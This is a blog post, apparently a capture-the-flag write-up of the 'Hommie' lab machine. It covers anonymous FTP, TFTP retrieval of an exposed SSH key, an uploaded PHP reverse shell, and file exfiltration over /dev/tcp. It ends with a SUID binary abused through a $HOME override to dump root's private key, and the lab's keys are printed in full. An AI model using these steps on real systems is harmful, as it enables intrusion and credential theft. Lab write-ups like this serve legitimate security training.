{"id":542,"date":"2024-04-13T14:20:09","date_gmt":"2024-04-13T06:20:09","guid":{"rendered":"http:\/\/162.14.82.114\/?p=542"},"modified":"2024-04-13T14:20:09","modified_gmt":"2024-04-13T06:20:09","slug":"hmv-_-hommie","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/542\/04\/13\/2024\/","title":{"rendered":"hmv[-_-]Hommie"},"content":{"rendered":"<h1>Hommie<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419690.png\" alt=\"image-20240413132820387\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419692.png\" alt=\"image-20240413132929475\" \/><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.5 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:172.20.10.8\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDB7u7KKhG7At4Hcc+14cLowxLnO8KM0ktmdNGlQ3NQTg5ccopYqycES73Ie8F8x8LuGmUf63rAlZb58bR8mU0mv5gK6+DvTfsxu8Qv4RlK8ydOyEVhIFk2mukt99lNMmWiQdJ4WHlcSkHFJ0V0YsUiMIQpI+OJQ7yFFIGvmP9wbfxrDcZHPZVt86NgTQ0vwQB\/1phH0+DxMNjsaE25qwJ9MDdEs7XxMj31YsTWwm3nLxBbl7SFmRsUsSchrNDTQ355c0kco7\/H5cGqI9xm3x9VNCaQmNYapKezhAaEWqvIfP59SCaa8n6NpuP2kPuGJnqdqYo+sM5l\/SoCWEJL5HlL\n|   256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFedEUVwZ\/C0itzERPAKuSiTugyl9+eZm4f9TQOujQAwyWHvyyiarpJCCqyaQg2DdQEPVMtO7cA3SpkISgseJlA=\n|   256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO5HkrVfk6hVBmA2oAFN8nYRmsoXH+1hUZIuyF0DN\/YA\n80\/tcp open  http    syn-ack nginx 1.14.2\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\nService Info: OSs: Unix, Linux; CPE: 
cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>Three services: anonymous FTP on vsftpd 3.0.3 (the listing shows a zero-byte <code>index.html<\/code>), OpenSSH 7.9p1, and nginx 1.14.2 serving a page with no title.<\/p>\n<h3>Directory scan<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419693.png\" alt=\"image-20240413133207143\" \/><\/p>\n<p>Nothing turned up, so I stopped scanning.<\/p>\n<h2>Vulnerability discovery<\/h2>\n<h3>FTP login<\/h3>\n<p>Try the anonymous logins: <code>anonymous<\/code> and <code>ftp<\/code>.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ftp 172.20.10.5\nConnected to 172.20.10.5.\n220 (vsFTPd 3.0.3)\nName (172.20.10.5:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; pwd\nRemote directory: \/\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||7447|)\n150 Here comes the directory listing.\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 .\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 ..\ndrwxrwxr-x    2 0        113          4096 Sep 30  2020 .web\n-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; ls -F\n229 Entering Extended Passive Mode (|||28677|)\n150 
Here comes the directory listing.\n-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; cd .web\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||31351|)\n150 Here comes the directory listing.\ndrwxrwxr-x    2 0        113          4096 Sep 30  2020 .\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 ..\n-rw-r--r--    1 0        0              99 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; get index.html\nlocal: index.html remote: index.html\n229 Entering Extended Passive Mode (|||45350|)\n150 Opening BINARY mode data connection for index.html (99 bytes).\n100% |***********************************************************************************************************|    99        1.45 MiB\/s    00:00 ETA\n226 Transfer complete.\n99 bytes received in 00:00 (147.15 KiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ cat index.html  \nalexia, Your id_rsa is exposed, please move it!!!!!\nIm fighting regarding reverse shells!\n-nobody<\/code><\/pre>\n<p>Only <code>ftp<\/code> is accepted as the anonymous account, and the note gives two usernames, <code>alexia<\/code> and <code>nobody<\/code>, plus a hint that the id_rsa of alexia is lying around somewhere. Note also the hidden <code>.web<\/code> directory: it only shows up with <code>ls -la<\/code> and is group-writable (<code>drwxrwxr-x<\/code>).<\/p>\n<h3>Footprinting<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419694.png\" alt=\"image-20240413133757655\" \/><\/p>\n<p>Checked the page source; nothing that points to a hostname or DNS resolution scenario.<\/p>\n<h3>Uploading a reverse shell<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ head revershell.php \n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;172.20.10.8&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ftp 172.20.10.5    \nConnected to 172.20.10.5.\n220 (vsFTPd 3.0.3)\nName (172.20.10.5:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||16177|)\n150 Here comes the directory listing.\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 .\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 ..\ndrwxrwxr-x    2 0        113          4096 Sep 30  2020 .web\n-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; cd .web\n250 Directory successfully changed.\nftp&gt; put revershell.php \nlocal: revershell.php remote: revershell.php\n229 Entering Extended Passive Mode (|||62858|)\n150 Ok to send data.\n100% |***********************************************************************************************************|  3909       93.19 MiB\/s    00:00 ETA\n226 Transfer complete.\n3909 bytes sent in 00:00 (4.25 MiB\/s)\nftp&gt; exit\n221 
Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ sudo pwncat-cs -lp 1234 2&gt;\/dev\/null\n[01:39:45] Welcome to pwncat \ud83d\udc08!<\/code><\/pre>\n<p>The file is there, but the server does not execute it.... nginx is only serving static content out of <code>.web<\/code>, so the PHP comes back as text and the listener never gets a callback.<\/p>\n<h3>Rescanning<\/h3>\n<p>Directory scanning gets nowhere, so something on the port side must have been missed. Rescan, this time over UDP.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ sudo nmap 172.20.10.5 -sU -p 1-100 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-13 02:17 EDT\nStats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 99.99% done; ETC: 02:18 (0:00:00 remaining)\nNmap scan report for 172.20.10.5\nHost is up (0.00039s latency).\nNot shown: 98 closed udp ports (port-unreach)\nPORT   STATE         SERVICE\n68\/udp open|filtered dhcpc\n69\/udp open|filtered tftp\nMAC Address: 08:00:27:84:22:C1 (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 112.27 seconds<\/code><\/pre>\n<p><code>open|filtered<\/code> on 69\/udp only means the probe drew no ICMP port-unreachable reply; the way to settle it is to speak TFTP to the port.<\/p>\n<h3>TFTP connection<\/h3>\n<p>Try connecting:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ tftp 172.20.10.5    \ntftp&gt; help\ntftp-hpa 5.2\nCommands may be abbreviated.  
Commands are:\n\nconnect         connect to remote tftp\nmode            set file transfer mode\nput             send file\nget             receive file\nquit            exit tftp\nverbose         toggle verbose mode\ntrace           toggle packet tracing\nliteral         toggle literal mode, ignore &#039;:&#039; in file name\nstatus          show current status\nbinary          set mode to octet\nascii           set mode to netascii\nrexmt           set per-packet transmission timeout\ntimeout         set total retransmission timeout\n?               print help information\nhelp            print help information\ntftp&gt; ls\n?Invalid command\ntftp&gt; get *\n^C\ntftp&gt; get id_rsa\ntftp&gt; exit\n?Invalid command\ntftp&gt; quit\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ls\n&#039;*&#039;   id_rsa   index.html   revershell.php<\/code><\/pre>\n<p>TFTP has no directory listing: <code>ls<\/code> is not a command, and <code>get *<\/code> simply requests a file literally named <code>*<\/code> (hence the stray <code>&#039;*&#039;<\/code> in the local directory). Every file has to be asked for by name, and the FTP note already said which one is exposed, so <code>get id_rsa<\/code> comes back with a key. Try logging in with it.<\/p>\n<h3>SSH login<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ssh hommie@172.20.10.5 -i id_rsa\nThe authenticity of host &#039;172.20.10.5 (172.20.10.5)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:v3AMNdrxbep3tZ0By0ik1\/V+ZHj5ZuiffVZSnafj2YA.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;172.20.10.5&#039; (ED25519) to the list of known hosts.\nhommie@172.20.10.5: Permission denied (publickey).\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ssh alexia@172.20.10.5 -i id_rsa\nLinux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Wed Sep 30 11:06:15 2020\nalexia@hommie:~$ whoami;id\nalexia\nuid=1000(alexia) gid=1000(alexia) groups=1000(alexia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)<\/code><\/pre>\n<p>The key is refused for <code>hommie<\/code> (that is the hostname, not a user) and accepted for <code>alexia<\/code>, the name from the FTP note.<\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">alexia@hommie:~$ sudo -l\n-bash: sudo: command not found\nalexia@hommie:~$ pwd\n\/home\/alexia\nalexia@hommie:~$ ls -la\ntotal 36\ndrwxr-xr-x 4 alexia alexia 4096 Sep 30  2020 .\ndrwxr-xr-x 3 root   root   4096 Sep 30  2020 ..\n-rw-r--r-- 1 alexia alexia  220 Sep 30  2020 .bash_logout\n-rw-r--r-- 1 alexia alexia 3526 Sep 30  2020 .bashrc\ndrwxr-xr-x 3 alexia alexia 4096 Sep 30  2020 .local\n-rw-r--r-- 1 alexia alexia  807 Sep 30  2020 .profile\ndrwx------ 2 alexia alexia 4096 Sep 30  2020 .ssh\n-rw-r--r-- 1 alexia alexia   10 Sep 30  2020 user.txt\n-rw------- 1 alexia alexia   52 Sep 30  2020 .Xauthority\nalexia@hommie:~$ cat user.txt \nImnotroot\nalexia@hommie:~$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/opt\/showMetheKey\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\nalexia@hommie:~$ file \/opt\/showMetheKey\n\/opt\/showMetheKey: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=63398a6916b1b6bf3991e2b05fa60bec15b1faff, not stripped\nalexia@hommie:~$ cd \/opt<\/code><\/pre>\n<h3>Analysing the binary<\/h3>\n<p>No <code>sudo<\/code> on the box, so the SUID list is the next stop, and <code>\/opt\/showMetheKey<\/code> stands out: it lives outside any package directory, is setuid and setgid, and is not stripped. Pull it over to the attack box to take a look (start the listener first, then push the file through <code>\/dev\/tcp<\/code>):<\/p>\n<pre><code class=\"language-bash\">alexia@hommie:\/opt$ cat showMetheKey &gt; \/dev\/tcp\/172.20.10.8\/8888<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ nc -lp 8888 &gt; showMetheKey<\/code><\/pre>\n<p>Take it apart:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ file showMetheKey\nshowMetheKey: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=63398a6916b1b6bf3991e2b05fa60bec15b1faff, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ strings showMetheKey   \n\/lib64\/ld-linux-x86-64.so.2\nlibc.so.6\nsetuid\nsystem\n__cxa_finalize\nsetgid\n__libc_start_main\nGLIBC_2.2.5\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nu\/UH\n[]A\\A]A^A_\ncat $HOME\/.ssh\/id_rsa\n;*3$&quot;\nGCC: (Debian 8.3.0-6) 
8.3.0\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.7325\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nshowMetheKey.c\n__FRAME_END__\n__init_array_end\n_DYNAMIC\n__init_array_start\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_csu_fini\n_ITM_deregisterTMCloneTable\n_edata\nsystem@@GLIBC_2.2.5\n__libc_start_main@@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n__libc_csu_init\n__bss_start\nmain\nsetgid@@GLIBC_2.2.5\n__TMC_END__\n_ITM_registerTMCloneTable\nsetuid@@GLIBC_2.2.5\n__cxa_finalize@@GLIBC_2.2.5\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.ABI-tag\n.note.gnu.build-id\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n<p><code>strings<\/code> already gives the game away: imports of <code>setuid<\/code>, <code>setgid<\/code> and <code>system<\/code>, and the literal <code>cat $HOME\/.ssh\/id_rsa<\/code>. The decompiled main in IDA confirms it:<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\n\/\/ IDA pseudocode of \/opt\/showMetheKey, a setuid+setgid root binary\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  setuid(0);   \/\/ real uid becomes 0 too, so the child shell keeps root\n  setgid(0);\n  system(&quot;cat $HOME\/.ssh\/id_rsa&quot;);   \/\/ \/bin\/sh -c ..., $HOME expanded from our environment\n  return 0;\n}<\/code><\/pre>\n<h3>Overriding $HOME to read the id_rsa of root<\/h3>\n<p>That makes it straightforward. The binary runs setuid root, <code>setuid(0)<\/code> sets the real uid to 0 as well, and it then hands <code>cat $HOME\/.ssh\/id_rsa<\/code> to <code>system()<\/code>, which starts <code>\/bin\/sh -c<\/code> with the environment it inherited from us. Nothing sanitises that environment, so pointing <code>HOME<\/code> at <code>\/root<\/code> makes the same command print the private key of root. The assignment must have no spaces around <code>=<\/code>: <code>HOME = \/root<\/code> is parsed as a command named <code>HOME<\/code>, which is the error seen below. Because real and effective uid are both 0, the shell does not drop privileges, so <code>PATH<\/code> would have been an equally good lever against <code>cat<\/code>; <code>HOME<\/code> is simply the shortest route:<\/p>\n<pre><code class=\"language-bash\">alexia@hommie:\/opt$ .\/showMetheKey \n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7\nV0zdgZSRFhMxx0\/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z\/lIqUNdHJbgLDyaY26G0y\nRn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT\ngCnBh1Wb4m4e14yF+Syn4wQVh1u\/53XGmeB\/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j\nQMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq\nkyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI\nM2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM\ndgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE\/KJYS5BQRkIw6qLmVLWRqI0eZW\nrH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7\/ndcaZ4H8KVx0B\ntIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku\/NHAYDMK5T\nd\/rSolVOnrmnMV\/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi\/\n+suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE\nUa47n1yGWSWMVaZ55ob3N\/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy\/2w\npmlMTtfdUo7JfEKbZmsz3auih2\/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk\nWeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE\/Jz\nbu4XlJXVeD10ooFofrsZd\/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu\n3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6\n0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14\/i5ti7r9z\nHlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7\/wK7XHTwtQZ7cCQTVqbbs\ny6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h\/MStsQYtY\nOZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08\nQPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp\nivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV\/wN\n0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg==\n-----END OPENSSH PRIVATE KEY-----\nalexia@hommie:\/opt$ echo $HOME\n\/home\/alexia\nalexia@hommie:\/opt$ HOME = \/root\n-bash: HOME: command not found\nalexia@hommie:\/opt$ 
HOME=\/root\nalexia@hommie:\/opt$ echo $HOME\n\/root\nalexia@hommie:\/opt$ .\/showMetheKey \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAvBYog1I3rTTmtMw6i7oPRYy7yj8N6zNT3K9QhalnaTF+Md5NjbX5\nhhNfZjO0tNbMGEeJtNTc3FpYWcAujrrd3jO5MzHUWAxQoyYYrZOFj2I5Fz\/0RxD7e89H11\n5nT7+CSUeddP\/UeoyvSPgaruwrwD+dUl7+GiXo3sc5vsq3YufTYh1MlMKb\/m7KmVk5n4Tk\n\/IFJwuuc3U4OZiRwXOmK4W2Gfo0Fonu6vFYmhpcCsi7V8g3hpVmOZIU8ZUtG1YbutCVbOC\nEGyc1p5nbnyC0IIF5Y2EhjeevX8gmj4Kdv\/y6yuvNdsJKm+ed2EEY9AymmPPwIpQshFwKz\nY0yB8N1jkQAAA8BiCyR9YgskfQAAAAdzc2gtcnNhAAABAQC8FiiDUjetNOa0zDqLug9FjL\nvKPw3rM1Pcr1CFqWdpMX4x3k2NtfmGE19mM7S01swYR4m01NzcWlhZwC6Out3eM7kzMdRY\nDFCjJhitk4WPYjkXP\/RHEPt7z0fXXmdPv4JJR510\/9R6jK9I+Bqu7CvAP51SXv4aJejexz\nm+yrdi59NiHUyUwpv+bsqZWTmfhOT8gUnC65zdTg5mJHBc6YrhbYZ+jQWie7q8ViaGlwKy\nLtXyDeGlWY5khTxlS0bVhu60JVs4IQbJzWnmdufILQggXljYSGN569fyCaPgp2\/\/LrK681\n2wkqb553YQRj0DKaY8\/AilCyEXArNjTIHw3WORAAAAAwEAAQAAAQA\/OvPDshAlmnM0tLO5\n5YLczsMS6r+zIj4\/InDffmPVaV4TRbisu1B3Umvv39IQOWXDg8k3kZfuPDEXexQrx4Zu\/N\nR18XqBXyJ8toH1WHK+ETdAKa\/ldEAXD0gHjyUMGkWifQDiJF86E7GZxk6yH5NVvg0Vc\/nY\nsIXo3vD6wwuDo\/gj+u4RRYMH3NYkLSj\/O67cxGXnTOZPGzGsFTrE218BNtNqbRBR9\/immU\nirjugqebxY135Z4oECe\/Hv4mP2e7n5QVO8FnYklQ4YU6y0ZTAMtjZCAhslXSKvaJPLjXuk\n\/HpdYhSoojm3vTAq\/NT\/oir0wA2ZYGdnF\/Bxm6v\/mntBAAAAgF2pqZEe9UqzcsAfOujr6z\nDMRgPpl8qsdhDz6aftdg24AYmgXJ1D7PWUDpU6puO3VxJGrOwvcgD6xELRTxeFjd\/2ssrh\n4OO\/kTvK4K0WVB\/bnZ4y724iLcThfHDbzTTc5ckn45tyso8540iKha5ay1i24GwRPWddie\nB\/qcB1bHNOAAAAgQDmmptuwTRwUSiU1NtZRnJFvxvzLw6Wy\/Cb2G+n5KY0ce5cYHT2HSIr\nzsbPaDXQNBFy4iu1DAXAJJXTrxjOaAeLVYSb\/8eZ1dhcgkxoAC8i2l6NwNmsjhGQKv++fV\nqMfIdzVmriLXBZf7DU97YZeDIOrdOOV5CHhq+37i4xNdK18wAAAIEA0Mzc8HYvrXk4ecyi\nKXP5u2Zxw2LADJ8DFeKWZmCUuNKFD1TuqdauxKxIVKVDaHvcnEr1bOiEBBso\/X1CCtKjE+\n12ZOWvqZ4fORxiNs9n\/9YxlUSDAw7kyKd9H7dRRFdtb80OgDiwf18tDlEdboGWm\/DR0NPq\ngmxzbd40GES6DWsAAAALcm9vdEBob21taWU=\n-----END OPENSSH PRIVATE KEY-----\nalexia@hommie:\/opt$ 
.\/showMetheKey &gt; \/tmp\/id_rsa\nalexia@hommie:\/opt$ cd \/tmp\nalexia@hommie:\/tmp$ chmod 600 id_rsa \nalexia@hommie:\/tmp$ ssh root@172.20.10.5 -i id_rsa \nThe authenticity of host &#039;172.20.10.5 (172.20.10.5)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:DJRhY4460szersb1lOMrzcqIuOctjcM95lIbf2pvnNk.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: Permanently added &#039;172.20.10.5&#039; (ECDSA) to the list of known hosts.\nLinux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Wed Sep 30 11:03:23 2020\nroot@hommie:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@hommie:~# cd \/root\nroot@hommie:~# ls -la\ntotal 32\ndrwx------  4 root root 4096 Sep 30  2020 .\ndrwxr-xr-x 18 root root 4096 Sep 30  2020 ..\n-rw-------  1 root root   52 Sep 30  2020 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Sep 30  2020 .local\n-rw-------  1 root root   44 Sep 30  2020 note.txt\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Sep 30  2020 .ssh\nroot@hommie:~# cat note.txt \nI dont remember where I stored root.txt !!!\nroot@hommie:~# cat .bash_history \ncd \/root\nls -la\nrm .bash_history\n\/usr\/sbin\/poweroff\nroot@hommie:~# find \/ -name root.txt -type f 2&gt;\/dev\/null\n\/usr\/include\/root.txt\nroot@hommie:~# cat \/usr\/include\/root.txt\nImnotbatman<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Hommie Information gathering Port scan rustscan -a 172.20.10.5 &#8212; -A PORT STA 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-542","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/542","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=542"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/542\/revisions"}],"predecessor-version":[{"id":543,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/542\/revisions\/543"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=542"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=542"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
